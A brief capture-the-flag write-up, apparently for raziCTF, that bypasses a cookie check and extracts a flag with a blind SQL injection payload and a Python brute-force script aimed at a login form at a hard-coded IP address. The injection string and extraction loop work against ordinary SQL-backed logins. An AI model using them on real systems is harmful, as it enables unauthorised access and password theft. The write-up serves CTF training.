Rating:
1. Change our cookie to 416c6c6f77=54727565 which is Allow=True
2. Then I wrote the script to bruteforce the password
3. query: uname=' or hex(substr(password,xx,1)) like 'xx'-- -&psw=123
```
import requests
import string
url = "http://130.185.122.155:8080/login"
Cookie = {"416c6c6f77":"54727565"}
password = "raziCTF{"
print(str(len(password))+'/33')
while True:
count = len(password)
for i in string.printable:
tmp_passwd = hex(ord(i))[2:]
base_query = "' or hex(substr(password,"+str(count+1)+",1)) like '"+tmp_passwd+"'-- -"
data ={"uname":base_query,"psw":"123"}
r = requests.post(url,data=data,cookies=Cookie)
if "You did it!!" in r.text:
password+=i
print(str(len(password))+'/33')
print(password)
break
count+=1
if(count> len(password)):
exit("Flag: "+password)
```